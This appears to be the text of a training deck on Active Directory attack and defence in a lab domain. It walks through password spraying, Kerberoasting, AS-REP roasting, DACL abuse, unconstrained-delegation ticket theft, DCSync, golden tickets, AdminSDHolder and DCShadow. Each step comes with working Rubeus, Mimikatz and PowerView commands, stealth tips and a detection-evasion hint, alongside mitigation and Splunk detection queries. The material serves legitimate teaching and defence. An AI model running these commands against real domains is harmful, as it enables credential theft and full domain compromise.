https://github.com/fox-it/BloodHound.py
AD RECON– BLOODHOUND (DATA COLLECTION)
Reference:
https://github.com/BloodHoundAD/BloodHound/wiki/Data-Collector

 Powershell ingestor.

 C# ingestor.

 The zip files can then be exfiltrated and uploaded to BloodHound via its GUI.

We’ll use BloodHound to find AD attack
paths later on. For now, let’s move onto
other AD recon techniques.

AD RECON– BLOODHOUND HANDBOOK
⋆⋆⋆ BloodHound Handbook (by @SadProcessor) ⋆⋆⋆
https://insinuator.net/2018/11/the-dog-whisperers-handbook/
 An awesome resource to get familiar with BloodHound and Cypher:

PowerView:
 PowerView is a Powershell script that is used to perform recon and enumeration on Windows
domains. It contains numerous functions that can be used to enumerate AND attack Active Directory.
# Example usage
Import-Module .PowerView.ps1
Get-Domain
SharpView:
 SharpView is a C# port of PowerView.
# Example usage
SharpView.exe Get-DomainController
Reference:
https://pentestlab.blog/tag/powerview/
https://threat.tevora.com/a-sharpview-and-more-aggressor/
AD RECON– POWERVIEW & SHARPVIEW

 A huge collection of Powershell cmdlets used to manage AD environments.
 It’s not usually installed by default and requires Remote Server Administration Tools (RSAT) tools to install.
 But, if you can get your hands on the AD module DLL from a system with it installed e.g.Windows Servers, you
can just import the DLL into your Powershell session without needing to install RSAT.
AD RECON– ACTIVE DIRECTORY MODULE
Reference:
https://docs.microsoft.com/en-us/powershell/module/addsadministration/?view=win10-ps

 The AD module can usually be found at this path on systems with it installed:
C:WindowsMicrosoft.NETassemblyGAC_64Microsoft.ActiveDirectory.Management

 Simply import the DLL file into a Powershell session on your target system and you’re ready to go.
 No admin rights required.
$env:psexecutionpolicypreference="bypass"
Import-Module PATH-TO-AD-MODULE-DLL
Get-ADComputer

 One huge advantage the AD module has is that it’s a legitimate Microsoft utility, meaning that it
shouldn’t be easily flagged by any AV/EDR products.

 Discovery-https://attack.mitre.org/tactics/TA0007/
 AccountDiscovery-https://attack.mitre.org/techniques/T1087/
 DomainTrustDiscovery-https://attack.mitre.org/techniques/T1482/
 RemoteSystemDiscovery-https://attack.mitre.org/techniques/T1018/
MITIGATION & DETECTION – DOMAIN ENUMERATION

 Detecting domain enumeration techniques can be pretty difficult since majority of the traffic generated by an
attacker during AD enumeration is difficult to distinguish from legitimate network traffic. Especially since
Windows networks tend to be “noisy” by default.
 The tips below may be useful when trying to detect & mitigate domain enumeration techniques:
 Monitor command line values for commonly used discovery tools/techniques e.g. net.exe.
 Enable enhanced Powershell logging to detect Powershell tradecraft such as PowerView and the AD-Module.
 Limit the utilities and programs users in your environment can use by configuring Application Whitelisting.
 Correlate enumeration activity to other events to help filter malicious activity from regular traffic.
NOTE: Some defensive solutions like Microsoft’s ATP are able to identify domain enumeration techniques by
building a baseline of regular network traffic and detecting anomalies. Read more below:
https://docs.microsoft.com/en-us/azure-advanced-threat-protection/atp-playbook-reconnaissance

 An example showing the detection of common domain enumeration techniques using net.exe.
index=* CommandLine=*net.exe* AND CommandLine=*/do*
| table ComputerName, User, CommandLine

7. DOMAIN PRIVILEGE ESCALATION

The situation:
We’ve collected information about the
FOX.com domain;it’s users,systems,services
and more.Now we want to use this information
to find various attack paths and elevate our
privileges within the domain.
DOMAIN PRIVILEGE ESCALATION
High Priv

 BloodHound - https://github.com/BloodHoundAD/BloodHound
 Password Spraying:
 DomainPasswordSpray - https://github.com/dafthack/DomainPasswordSpray (Powershell)
 SharpSpray - https://github.com/jnqpblc/SharpSpray (C#)
(Powershell)
 Rubeus - https://github.com/GhostPack/Rubeus (C#)
DOMAIN PRIVILEGE ESCALATION TOOLS

 Password spraying is an attack that attempts to gain access to a large number of accounts with a
few commonly used passwords. It’s basically the opposite of bruteforcing which attempts to access
a single or small number of accounts using numerous passwords.
 We’ll use 2 tools to password spray users in the FOX.com domain.
 DomainPasswordSpray - https://github.com/dafthack/DomainPasswordSpray (Powershell)
 SharpSpray - https://github.com/jnqpblc/SharpSpray (C#)
DOMAIN PRIVESC – PASSWORD SPRAYING

 Before you start spraying, you should take a look at your target domain’s password policy.
 This is crucial information when picking a password/passwords to spray against the domain’s users,
especially the Minimum Password Length and the Lockout Threshold.

The success of your password spray depends entirely on the probability that the few passwords you use are going
to find matches in your target user scope. There’s no silver bullet for password selection, but here are a few
suggestions for password combinations you can consider:
 Company name and year (e.g.WorldBank2019!).
 City/country and year (e.g. Kenya2019!, Nairobi2019!)
 Season + year (e.g. Spring2019! – this depends on where you live; it doesn’t apply everywhere but you should
still know about it).
 Phone numbers (yeah, I’ve seen password policies that allow numeric passwords).
 Crappy passwords (e.g. 12345678, password, qwerty and so on):
 https://www.thethreatreport.com/some-of-the-worst-passwords-of-2018/

DOMAIN PRIVESC – PASSWORD SPRAYING (DomainPasswordSpray)
#Automatically generate a list of users from the current domain and attempt to authenticate using each
username and the specified password.
Import-Module .DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Domain fox.com -Password PASSWORD

DOMAIN PRIVESC – PASSWORD SPRAYING (DomainPasswordSpray)
 A successful spray.

DOMAIN PRIVESC – PASSWORD SPRAYING (SHARPSPRAY)
#Password spray against all users of the domain using LDAP with a default delay time of 1000
milliseconds between guesses.
SharpSpray.exe --Passwords Qwertyuiop123

DOMAIN PRIVESC – PASSWORD SPRAYING (SHARPSPRAY)
 If you get lucky, you might find an admin’s password while spraying.
 Never forget, admins are people too ;)

 Kerberoasting takes advantage of how service accounts leverage Kerberos authentication with Service
Principal Names (SPNs).
 Attackers possessing a valid Kerberos ticket-granting ticket (TGT) can request one or more Kerberos ticket-
granting service (TGS) service tickets for any user with an SPN from a domain controller (DC).
 A summary of the Kerberoast attack:
1. Identify user accounts with SPNs.
2. Request service tickets for these accounts.
3. Extract the tickets and the hash value associated with them.
4. Crack/bruteforce these hashes offline on your attacker system.
5. Gain access to the service account using the cracked password.
Read more about Kerberoasting:
https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
DOMAIN PRIVESC – KERBEROASTING

Finding vulnerable users (users with SPNs).
 BloodHound: Bloodhound has a few pre-built queries that detect Kerberoastable users.

 BloodHound: We can also use the query below to find users with SPNs from BloodHound’s Neo4j
backend (found at http://localhost:7474).
MATCH (u:User {hasspn: true})
RETURN u.name

 PowerView:
Get-DomainUser | select name,serviceprincipalname
 AD-Module:
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | select
SamAccountName,Name,Enabled

 We can now use Rubeus to Kerberoast all vulnerable users in the FOX.com domain.
#Kerberoast all users with SPNs
Rubeus.exe kerberoast
#Kerberoast a specific user
Rubeus.exe kerberoast /user:USERNAME /domain:DOMAIN-NAME
#Kerberoast all users and write the Kerberos hashes to a Hashcat compatible file
Rubeus.exe kerberoast /format:hashcat /outfile:.FILE-NAME

 Let’s use Hashcat on our attacker system to run a bruteforce against the extracted Kerberos hash file.
hashcat --help | grep Kerberos
hashcat -m 13100 -a 0 HASHES-FILE WORDLIST

 We got one password 

 AS-REP roasting is a technique that allows attackers to extract the password hashes for users that have the “Do not
require Kerberos preauthentication” property enabled in Active Directory.
 The extracted hashes can then be cracked offline, just like with kerberoasting.
 This ISN’T a default setting in domain controllers. An administrator needs to intentionally enable this configuration.
Read more about AS-REP roasting:
https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
DOMAIN PRIVESC – AS-REP ROASTING

Finding vulnerable users (users that don’t require Kerberos preauthentication).
 BloodHound: We can also use the query below to find vulnerable users from BloodHound’s Neo4j
backend (found at http://localhost:7474).
MATCH (u:User {dontreqpreauth: true})
RETURN u.name

Finding vulnerable users (users that don’t require Kerberos preauthentication).
 AD-Module:
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties
useraccountcontrol | select SamAccountName,Name,Enabled
 PowerView:
Get-DomainUser -PreauthNotRequired | select
name,userprincipalname,admincount

 We can now use Rubeus to AS-REP roast all vulnerable users in the FOX.com domain.
#AS-REP roast all users that don’t require preauth
Rubeus.exe asreproast
#AS-REP roast a specific user
Rubeus.exe asreproast /user:USERNAME /domain:DOMAIN-NAME
# AS-REP roast all users and write the password hashes to a JohnTheRipper compatible file
Rubeus.exe asreproast /format:john /outfile:.FILE-NAME

 Use JohnTheRipper on our attacker system to run a bruteforce against the extracted Kerberos hash file.
john HASHES-FILE --wordlist=WORDLIST
john --show HASHES-FILE

ACTIVE DIRECTORY ACLs:
 Objects in AD are securable using Access Control Lists and Access Control Entries.
 The information associated with a securable object is held in its security descriptor. A security descriptor for a
securable object such as a user or a group can contain 2 types of ACLs:
 Discretionary Access Control List (DACL) - specifies the access rights allowed or denied to particular users
or groups.
 System Access Control List (SACL) - specifies the types of access attempts that generate audit records for the
object.
 Active Directory ACLs are a very broad topic that we’re not going to get into; but something you should know is that
with the right DACL permissions (GenericWrite/GenericAll) on an AD object (e.g a user or group) we can modify
most of the objects attributes without needing any sort of administrative rights in the domain.
 We’re going to abuse misconfigured DACLs in FOX.com to modify user’s attributes and perform targeted roasting
attacks on them (Kerberoasting & AS-REP roasting).
Read more about Active Directory Access Control Lists:
https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists
https://secureidentity.se/acl-dacl-sacl-and-the-ace/
DOMAIN PRIVESC – TARGETED ROASTING

We first need to find objects that our compromised domain user has GenericAll or GenericWrite permissions on
within the FOX.com domain.
BloodHound:
BloodHound can automatically detect ACLs of interest. To start, mark your compromised domain user(s) as owned.

BloodHound:
With a user marked as owned, we can use one of BloodHound’s pre-built queries to automatically detect ACL attack paths.
Our compromised user (MILLER) has
GenericAll permissions on user RAIDEN who
is a member of the Domain Admins group

DOMAIN PRIVESC – BLOODHOUND’S HELP FEATURE
Ask for help:
One of BloodHound’s most underrated features is its help function. If you’re ever clueless about how you can abuse an
attack path detected by BloodHound, simply right click on the attack path/node relationship and select Help.

PowerView:
We can verify that our user has GenericAll permissions on user Raiden using PowerView.
Get-DomainObjectAcl -ResolveGUIDs -SamAccountName raiden | ? {$_.ActiveDirectoryRights -match 'GenericAll'}

GenericAll/GenericWrite Abuse:
 With GenericAll/GenericWrite permissions, we can do almost anything we want to our target user.We could
easily reset their password to any value we’d like and then access their account.
 The problem with the attack method above is that it’s likely to raise suspicions since the user will no longer be
able to access their account with their old password. The attacks below are a lot stealthier:
1) Targeted Kerberoasting - Use our GenericWrite permissions to set a Service Principal Name (SPN) on the
domain user’s account, Kerberoast them and extract their password hash, crack the Kerberos hash offline and
gain access to their account using their password. To alleviate suspicion, we can delete the SPN we set
immediately after extracting the password hash.
2) Targeted AS-REP roasting - Use our GenericWrite permissions to change the target user’s
UserAccountControl (UAC) value to not require Kerberos preauthentication, AS-REP roast them and extract
their password hash, crack it offline and reset the target user’s UAC value.
NOTE: Both attacks above still rely on the user having a crackable password.

DOMAIN PRIVESC – TARGETED ROASTING (KERBEROAST)
1) Targeted Kerberoasting:
 We can use PowerView or the AD Module to set any SPN we want on the target user’s account.
Set-DomainObject raiden -Set @{'serviceprincipalname'='heybuddy/imabouttoroastyou'} -Verbose
Get-NetUser -Identity raiden | select samaccountname, serviceprincipalname
AD Module Command:
Set-ADUser -Identity raiden -ServicePrincipalNames @{Add='heybuddy/imabouttoroastyou'}

 Now we can use Rubeus to Kerberoast the target user.
Rubeus.exe kerberoast /user:raiden /domain:fox.com

 Don’t forget to stay opsec safe and remove the fake SPN once you’re done roasting them.
Set-DomainObject raiden -Clear serviceprincipalname -Verbose
Get-NetUser -Identity raiden | select samaccountname, serviceprincipalname

 Finally, we can crack the extracted Kerberos hash offline and access the user’s account with their password.
hashcat -m 13100 -a 0 HASHES-FILE WORDLIST

DOMAIN PRIVESC – TARGETED ROASTING (AS-REP ROAST)
2) Targeted AS-REP roasting:
 We can use PowerView to change the target’s UserAccountControl value to not require Kerberos preauthentication.
Set-DomainObject raiden -Set @{'useraccountcontrol'='4260352'} -Verbose
Get-DomainUser -PreauthNotRequired | select name,userprincipalname,admincount

 Use Rubeus to AS-REP roast the target user.
Rubeus.exe asreproast /user:raiden /domain:fox.com

 Use PowerView again to reset the user’s UAC value and revert our changes
Set-DomainObject raiden -Set @{'useraccountcontrol'='66048'} -Verbose
Get-DomainUser -PreauthNotRequired | select name,userprincipalname,admincount
User RAIDEN no longer appears in
the list of users not requiring
Kerberos preauthentication

 Crack their AS-REP password hash offline.
john HASHES-FILE --wordlist=WORDLIST
john --show HASHES-FILE

UNCONSTRAINED KERBEROS DELEGATION:
 A feature that was introduced to Active Directory in Windows Server 2000 to solve the Kerberos double hop issue.
 A domain server/computer with unconstrained Kerberos delegation enabled can impersonate any users or
computers connecting to it because their Ticket-Granting Ticket (TGT) is placed into the computer’s memory so the
computer can use it to authenticate to other services on behalf of the connected user.
 Why is this interesting for us? If we can compromise a domain computer with unconstrained delegation enabled, we
can wait for a user with administrative privileges e.g. a domain admin to connect to us and then steal their ticket and
use it across the domain without having to know (or crack) the account’s password.
 An even better attack method is forcing the Domain Controller (DC) to connect to our compromised server and then
steal its ticket, effectively giving us full control over the domain.We’ll use this method to gain full domain
compromise, you can learn more about this method in this awesome presentation by @harmj0y and @tifkin.
Read more about Unconstrained Kerberos Delegation:
https://adsecurity.org/?p=1667
https://blog.stealthbits.com/unconstrained-delegation-permissions/
https://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/
DOMAIN PRIVESC – UNCONSTRAINED DELEGATION

 First things first, we need to find domain computers/servers with Unconstrained Kerberos Delegation enabled.
BloodHound:
We can use the query below to find vulnerable systems from BloodHound’s Neo4j backend (http://localhost:7474).
MATCH (c:Computer {unconstraineddelegation: true})
RETURN c.name
NOTE: The domain controller will always be on this list.

 We can do the same thing with PowerView or the AD Module.
AD-Module:
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
PowerView:
Get-DomainComputer -Unconstrained | select
name,dnshostname,operatingsystem

 We then need to compromise one of these identified systems and acquire local administrative rights.
 We’ll just assume this has already happen using one of the attack paths we’ve already covered e.g. Kerberoasting.
 With the unconstrained delegation server compromised, we need to setup Rubeus to monitor for incoming user
connections.
 NOTE: This needs to be done from a high integrity/administrator session.
 DON’T close this prompt until we’ve grabbed our ticket.
#Monitor all logon events (EventID 4624)
Rubeus.exe monitor /interval:1

 Everything’s setup and we could just wait for an admin user to connect to us, but why do that when we can force
the domain controller to connect to us and steal its ticket, immediately giving us full domain compromise? ;)
 To do this we’ll need to download and compile @tifkin’s SpoolSample; a PoC tool that can be used to coerce
Windows systems to authenticate to any host using the MS-RPRN RPC interface.

 Once we have the SpoolSample executable on our compromised host we can force the domain controller to
authenticate to our compromised unconstrained delegation server. This doesn’t require administrator privileges.
SpoolSample.exe TARGET-HOST DELEGATION-SERVER
 NOTE:You may get some error messages, but this doesn’t mean the attack failed. Let’s see what’s happening over
in our Rubeus session.

 Over in Rubeus…
 We grabbed the domain controller’s authentication ticket.We can now impersonate the domain controller.
 How about we abuse this access?

 Copy the entire ticket and use the command below to import it into any domain user’s session.
Rubeus.exe ptt /ticket:BASE-64-TICKET-HERE

 Great.We’ve imported the DC’s ticket into our session, one of the best ways to abuse this access is to use the
DCSync attack to extract the NTLM password hashes for any users in the domain.
 Domain Controllers have the rights to do this since they’re required to replicate domain information.
 We can use the Mimikatz command below to easily DCSync any user in the domain.
lsadump::dcsync /user:DOMAINUSERNAME

 2 NTLM hashes you’ll definitely want to grab are the domain administrator’s and the krbtgt account hash.
lsadump::dcsync /user:DOMAINadministrator
lsadump::dcsync /user:DOMAINkrbtgt
 NOTE: We’ll use the krbtgt NTLM hash to set domain persistence in the next section.

 PrivilegeEscalation-https://attack.mitre.org/tactics/TA0004/
 CredentialAccess-https://attack.mitre.org/tactics/TA0006/
 CredentialDumping -https://attack.mitre.org/techniques/T1003/
 BruteForce(PasswordSpraying)-https://attack.mitre.org/techniques/T1110/
 Kerberoasting-https://attack.mitre.org/techniques/T1208/
MITIGATION & DETECTION – DOMAIN PRIVESC

MITIGATION & DETECTION – PASSWORD SPRAYING
MITIGATION:
 The most straightforward defense against password spraying is strong account and password
policies that ensure users use hard to guess passwords/passphrases and disallow too many login
attempts from attackers before accounts are locked out.
 But even strong password and account policies may not be enough to prevent password spraying
since, unlike bruteforcing, it allows an attacker to be patient with their access attempts.
 So how do we detect it?
Reference:
 https://attack.mitre.org/techniques/T1110/
 https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-
Event-Auditing

MITIGATION & DETECTION – PASSWORD SPRAYING
 Hunt for numerous failed login attempts (EventCode 4625) targeting multiple accounts, originating from a
single source within a specified amount of time e.g. a 1 hour window.
host="FOX-SVR-DC" EventCode=4625
| stats count by Account_Name,Workstation_Name, Failure_Reason

MITIGATION & DETECTION – KERBEROASTING
MITIGATION:
 Ensure strong password length (25+ characters) and complexity for service accounts and that
these passwords periodically expire.
 Limit service account privileges and don’t login to systems with service accounts with domain
admin accounts. Use dedicated accounts that have limited access to your domain.
Reference:
 https://adsecurity.org/?p=3458

DETECTION:
 Kerberos service ticket requests are VERY frequent in a real world network/domain. So here’s
some advice to filter the noise:
 Service name should not be krbtgt.
 Service name is not a machine/computer account.
 Failure code is '0x0' (to filter out failures, 0x0 is success).
 Most importantly, ticket encryption type is 0x17.
Reference:
 https://jsecurity101.com/2019/IOC-differences-between-Kerberoasting-and-AsRep-Roasting/

 Look for irregular activity such as a single user requesting multiple service tickets in a very short timeframe.
 A lot of attackers will attempt to extract Kerberos hashes from all domain accounts found with SPNs.
index=* EventCode=4769 Service_Name!="krbtgt" Service_Name!="*$" Failure_Code ="0x0" Ticket_Encryption_Type="0x17"
Account_Name!="*$@fox.com"
| eval Message=substr(Message,1,40)
| table _time, Account_Name, Service_Name, Message

MITIGATION & DETECTION – AS-REP ROASTING
MITIGATION:
 You’re honestly better off focusing on mitigating AS-REP roasting than you are focusing on detecting it.
 Identify all user accounts in your domain with the “Do not require Kerberos preauthentication” setting enabled and
disable the setting. If the feature is required for some sort of backwards compatibility; limit the account’s privileges
and access across your environment and ensure they have very strong passwords.
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name,Enabled
 If you still want to try and detect it, here’s a great write-up on detecting Kerberoasting and AS-REP roasting:
https://jsecurity101.com/2019/IOC-differences-between-Kerberoasting-and-AsRep-Roasting/

MITIGATION & DETECTION – TARGETED ROASTING
MITIGATION:
 Audit your domain ACLs & ACEs to identify the users that are capable of modifying the attributes of sensitive
objects such as admin users and groups.
 BloodHound isn’t just for attackers. Run it in your domain today.
 Maintain a least privilege policy to ensure users only have the rights they require to do their job.
DETECTION:
 Monitor Event ID 4738 (a user account was changed) and EventID 5136 (a directory service object was
modified) for suspicious activity such as an SPN being added to a non-service user account or unwarranted
changes to a domain user’s UAC value.
Reference:
• https://www.manageengine.com/products/active-directory-audit/account-management-events/event-id-4738.html
• https://www.manageengine.com/products/active-directory-audit/kb/system-events/event-id-5136.html

 EventID 4738 showing user MILLER modifying user RAIDEN to not require Kerberos preauthentication.
index=* EventCode=4738 Message=*Preauth*
| stats count by Account_Name, TaskCategory, Message

 EventID 5136 showing user MILLER setting and then deleting a fake SPN on user RAIDEN.
index=* EventCode=5136
| table _time, Account_Name, Type, LDAP_Display_Name,Value, DN
| rename LDAP_Display_Name as Property, DN as Target_Object

 You should also never see Kerberos service ticket requests for non-service domain user accounts.
 This is usually a sign of a targeted roast against your domain users.
index=* EventCode=4769 Service_Name!="krbtgt" Service_Name!="*$" Failure_Code ="0x0" Ticket_Encryption_Type="0x17“ Account_Name!="*$@fox.com"
| eval Message=substr(Message,1,40)
| table _time, Account_Name, Service_Name, Message

MITIGATION & DETECTION – UNCONSTRAINED DELEGATION
MITIGATION:
 Don’t use unconstrained delegation, instead focus on using constrained delegation; it’s a safer form of
Kerberos delegation that allows you to specify the services that the server with delegation enabled can access.
 All sensitive user accounts (e.g. domain admins) should also be configured with the “Account is sensitive and
cannot be delegated” setting. This will prevent their TGT tickets from being forwarded to other systems.
 Consider using the Protected Users group in Active Directory. Just like the setting above, this group prevents
forwarding of its members credentials via any sort of Kerberos delegation.
Reference:
 https://adsecurity.org/?p=1667
 https://blogs.technet.microsoft.com/389thoughts/2017/04/18/get-rid-of-accounts-that-use-kerberos-unconstrained-
delegation/
 https://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/

DETECTION:
 The SpoolSample method we used isn’t the only way unconstrained delegation can be abused.
 But since it’s the attack method we covered, we’ll discuss some of the applicable detection
methods while using SpoolSample discussed in this amazing post by @Cyb3rWard0g.
 Some of the detection techniques highlighted in the post are:
 Rubeus.exe command line values.
 Rubeus.exe process typo during Kerberos ticket enumeration.
 Rubeus.exe behavior when accessing lsass.exe.
 Detecting SpoolSample.exe traffic.

 As mentioned earlier, command line values can be easily manipulated by attackers and shouldn’t be relied on.
 Here’s a simple query to detect command line values containing the word “Rubeus”.
index=windows AND sourcetype="wineventlog:microsoft-windows-sysmon/operational" CommandLine=*Rubeus*
| table _time, ComputerName, User, Image, IntegrityLevel, CommandLine

 A more interesting artifact is a typo made by Rubeus while enumerating Kerberos tickets.
 It generates a process named User32LogonProcesss. That’s process with 3 “s”.
 I’ve got no idea if this is an intentional artifact or not, but it should be pretty easy to detect in your environment.
index=* EventCode=4611 Logon_Process_Name="User32LogonProcess"
| table _time, Account_Name, Message

ATTACKER TIP – RUBEUS TYPO
 An attacker can bypass this specific detection by changing the process string in Rubeus’s code.
 You can change the process name in the LSA class file (LSA.cs).

 Another method to detect Rubeus’s behavior highlighted in @Cyb3rWard0g’s post is looking for Audit Failures in
EventID 4673 (a privileged service was called) since Rubeus attempts to access the privileged
LsaRegisterLogonProcess() service without the SeTcbPrivilege set. Filter out non-system users to reduce the noise.
index=* EventCode=4673 Keywords="Audit Failure" Account_Name!="*$"
| table _time, ComputerName, Account_Name, Privileges, Service_Name,Process_Name

 To detect SpoolSample usage, monitor pipe connect events (Sysmon ID 18) and filter connections from unconstrained
delegation servers binding to the spoolss service, especially when connecting to domain controllers.
index=* EventCode=18 PipeName=*spoolss*
| table _time, ComputerName, EventType, PipeName
 NOTE: SpoolSample isn’t the only method that can be used to force computers to authenticate to your compromised unconstrained
delegation server; but it’s the only publically available method at the moment…as far as I know.

The situation:
We’ve fully compromised the entire forest using
a combination of active directory attacks and we
want to set persistence across the entire domain;
ensuring easy AD dominance if we ever have to
compromise the network again.
DOMAIN PERSISTENCE
High Priv

 Mimikatz - https://github.com/gentilkiwi/mimikatz (C)
(Powershell)
DOMAIN PERSISTENCE TOOLS

 Domain wide persistence tends to require domain admin rights.
 For this entire section, we’ll assume we’ve attained these privileges using the attacks we covered in
the previous phase. There are plenty of methods to set domain persistence and not enough time to
go through them all so we’ll take a look at some commonly abused techniques:
1) Golden Tickets.
2) AdminSDHolder.
3) DCShadow.
DOMAIN PERSISTENCE – GOLDEN TICKETS

GOLDEN TICKETS:
 Golden tickets are an attack that involve forging Ticket Granting Tickets (TGTs).With high enough privileges, an
attacker can forge a TGT tickets that allows them to access any computer on the domain.
 The most important requirement to forge a golden ticket is the KRBTGT account password hash, which we acquired
using DCSync in the domain privilege escalation section. Other than that, the following information is also required:
1) User account to create the ticket for.
2) RID of the account you will be impersonating (this will default to 500; the administrator’s account).
3) Domain Name.
4) Domain SID.
Read more about Golden Tickets:
https://blog.stealthbits.com/complete-domain-compromise-with-golden-tickets/

 With all the information collected, you can use the any of the Mimikatz commands below to create a golden ticket:
#Create a golden ticket and write it to a file
kerberos::golden /user:USERNAME /id:500 /domain:DOMAIN-FQDN /sid:DOMAIN-SID /krbtgt:KRBTGT-ACCOUNT-HASH
/ticket:TICKET-FILE-NAME
#Create a golden ticket and submit it to the current user’s session
kerberos::golden /user:USERNAME /id:500 /domain:DOMAIN-FQDN /sid:DOMAIN-SID /krbtgt:KRBTGT-ACCOUNT-HASH /ptt

 With the golden ticket created, we can use Mimikatz to import it into any domain user’s session and grant them
access to the domain controller with the administrator’s privileges.
kerberos::ptt GOLDEN-TICKET-FILE
kerberos::list
misc::cmd
dir DOMAIN-CONTROLLERC$

 One of the reasons golden tickets are very dangerous and often abused by attackers is that they have a default
lifetime of 10 years (the default maximum ticket age in Active Directory).
 They are also very difficult to remove/invalidate once they have been created by attackers.

ADMINSDHOLDER:
 AdminSDHolder is a container that exists in every single AD domain.
 It is used as a template to hold permissions for sensitive/protected groups in AD such as domain admins.
 The AdminSDHolder is owned by the Domain Admins group; meaning if you have domain admin rights you can
backdoor the AdminSDHolder container by giving any user you’d like GenericAll permissions on it; effectively
making your user a domain administrator without actually adding them to the group; which is great for opsec.
 Changes to the AdminSDHolder’s ACL entries are applied to all protected users and groups every 60 minutes by
default, so it’s not immediate but it’s usually worth the effort.
Read more about AdminSDHolder:
https://tsmith.co/2011/what-is-adminsdholder/
https://blog.stealthbits.com/persistence-using-adminsdholder-and-sdprop/
DOMAIN PERSISTENCE – ADMINSDHOLDER

 With domain administrator rights, use the PowerView command below to give any domain user GenericAll
permissions on the AdminSDHolder container. I’ll do this for user MILLER.
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=fox,DC=com' -PrincipalIdentity USERNAME -Rights All -
Verbose
NOTE: You will have to wait over 60 minutes for the changes to take effect.

 We can then verify that our low privilege user MILLER has GenericAll rights on the AdminSDHolder container.
$UserSID = Get-DomainUser USERNAME | Select-Object -ExpandProperty objectsid
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=fox,DC=com' -ResolveGUIDs | Where-Object
{$_.securityidentifier -eq $UserSID }

 We now have the equivalent of a domain admin's privileges without actually being in the domain admins group.
 To prove this, assuming you’ve waited long enough; we can add our low privilege user to the Domain Admins group
and open a remote session to the domain controller using Powershell remoting.
net group "domain admins" USERNAME /add /domain
Enter-PSSession DC-HOSTNAME
NOTE:
This isn’t the only way to abuse GenericAll permissions, you can add users to any sensitive group, reset user’s passwords and more.

DCSHADOW:
 DCShadow is a persistence technique that works by registering a rogue domain controller, allowing an attacker to
push malicious changes into the environment by modifying active directory objects.
 Just like all the other persistence techniques we’ve covered, an attacker will need domain administrator privileges to
carry out this attack.
 There are numerous ways to use DCShadow for persistence since we can basically modify any active directory
objects we’d like to and push them to the domain controller and the rest of the domain.
 For a simple demo, we’ll just add a low privilege user to the domain admins group.
Read more about DCShadow:
https://www.dcshadow.com/
https://attack.stealthbits.com/how-dcshadow-persistence-attack-works
https://blog.stealthbits.com/dcshadow-attacking-active-directory-with-rogue-dcs/
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-
dcshadow
DOMAIN PERSISTENCE – DCSHADOW

 To start, we’ll need 2 Mimikatz sessions/shells running on any PC on the domain:
1) One with domain admin rights.
2) Another with NT AUTHORITYSYSTEM rights (NOT local admin rights)
Mimikatz with
domain admin rights
Mimikatz with NT
AUTHORITYSYSTEM rights

 From the SYSTEM Mimikatz session, lets add user MILLER to the domain admins group by updating their
primaryGroupID with the SID 512 (domain admins group SID).
lsadump::dcshadow /object:USERNAME /attribute:primaryGroupID /value:512

 With the changes made on the local PC, we can use the domain admin Mimikatz session to push the changes to the
legitimate domain controller; effecting them across the entire domain.
lsadump::dcshadow /push

 In our SYSTEM Mimikatz session we can see that our changes were pushed to the legitimate domain controller:

 We can now check the members of the domain admins group.
 As I mentioned earlier there are a lot more ways to abuse DCShadow for domain persistence. Adding a low
privileged user to the domain admins group definitely isn’t an opsec safe technique to use in the real world.
 Consider using DCShadow for stealthier domain persistence techniques such as backdooring AdminSDHolder.
 The great blogpost below contains instructions on how to do this:
https://blog.stealthbits.com/creating-persistence-with-dcshadow/

 Persistence-https://attack.mitre.org/tactics/TA0003/
 DCShadow- https://attack.mitre.org/techniques/T1207/
MITIGATION & DETECTION – DOMAIN PRIVESC

MITIGATION & DETECTION – GOLDEN TICKETS
MITIGATION:
 This is definitely one of those prevention is better than cure moments. Almost all domain persistence techniques are.
 Golden tickets are VERY difficult to detect because they are valid Kerberos tickets.Yes, they’re often created with a
10 year lifespan but authentication ticket lifespans are not tracked in AD’s event logs.
 Additionally removing golden tickets from your environment can be very troublesome since you’ll need to reset your
KRBTGT account password twice, something that I wouldn’t recommend doing without intensive prior research into
its possible effects on your environment.
